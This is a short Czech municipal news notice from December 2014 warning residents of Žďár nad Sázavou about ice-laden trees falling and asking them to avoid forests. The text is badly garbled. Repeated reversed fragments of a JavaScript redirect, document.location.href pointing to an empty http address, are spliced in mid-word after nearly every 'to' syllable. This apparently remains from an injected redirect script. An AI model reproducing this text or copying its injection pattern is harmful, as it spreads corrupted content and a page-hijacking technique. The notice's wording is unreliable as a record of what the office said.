ledovka, námraza
Rainbow page separator

Hrozí riziko pádu stromů, omezte vstup do lesů a dbejte zvýšené opatrnosti

Úterý, 2. prosince 2014

Námraza, ledovka

Žďár nad Sázavou / Městský úřad Žďár nad Sázavou, odbor životního prostředí, jako orgán státní správy lesů upozorňuje v souladu s výstrahou ČHMU na ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toucí nebezpečí námrazy, v důsledku čehož může docházet k pádům stromů či jejich částí a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nejen v lesích. Dbejte pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zvýšené opatrnosti při pohybu ve venkovním pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru a předcházejte škodám.

„Vyzýváme pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to po dobu trvání [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to meteorologického jevu k omezení vstupu do lesů a ke zvýšené opatrnosti. Respek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továním [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doporučení občané sníží riziko ohrožení zdraví či poškození majetku“, uvedl Jaroslav Doubek, vedoucí odboru životního prostředí MěÚ.